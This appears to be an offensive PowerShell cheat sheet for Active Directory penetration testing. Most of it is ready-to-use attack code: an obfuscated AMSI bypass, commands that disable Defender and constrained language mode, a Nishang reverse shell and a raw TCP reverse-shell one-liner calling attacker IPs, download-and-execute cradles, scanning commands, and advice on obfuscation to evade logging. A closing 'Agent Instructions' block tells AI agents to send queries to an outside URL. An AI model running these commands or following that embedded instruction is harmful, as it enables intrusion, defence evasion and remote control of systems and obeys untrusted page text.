# Offensive Powershell ### Pass Creds ``` # If you have RDP access and can get a prompt $cred = Get-Credential Domain\Username invoke-command -Credential $cred -computername x -scriptblock {whoami} # If you are over C2 and cant get a prompt $password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami} ``` ### AMSI Bypass ``` sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` ### Execution Policy ``` powershell -ep bypass ``` ### Help ``` Get-Help ``` ### Checking Language Mode ``` $ExecutionContext.SessionState.LanguageMode ``` When constrained can add the functions at end of script. E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you. ### Disabling Constrained Language Mode Note: This only works if its set locally. Needs to be run as system and is two underscores. ``` # Check (4 = constrained, 8 = unconstrained) $env:__PSLockDownPolicy # Change setx __PSLockdownPolicy "8" /M ``` ### Applocker Policy ``` Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` ### Disable Defender ``` Set-MpPreference -DisableRealtimeMonitoring $true -Verbose ``` ### Copy File to target ``` Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files' Copy-Item C:\file C:\Users\target\ -ToSession $sess Copy-Item C:\Users\target\file C:\ -FromSession $sess ``` ### Reverse Shell Nishang ``` powershell.exe iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443) ``` Might need to modify nishang script first so that the function name is correct. ### Reverse Shell Listener ``` Import-Module .\powercat.ps1 powercat -l -v -p 443 ``` ### Reverse Shell One Liner ``` $client = New-Object System.Net.Sockets.TCPClient("172.16.1.23",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ### IEX ``` powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2 powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1')) ``` ### Ping Sweep ``` # Sweep computers in a /24 subnet 1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"} ``` ### Testing Ports ``` Test-NetConnection -ComputerName -Port # Nishang Invoke-PortScan -StartAddress -EndAddress [-PortScan] [-Port <>] ``` ### Obfuscation Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel\`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel () are very useful for implementing obfuscation. Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction () is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/active-directory/powershell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.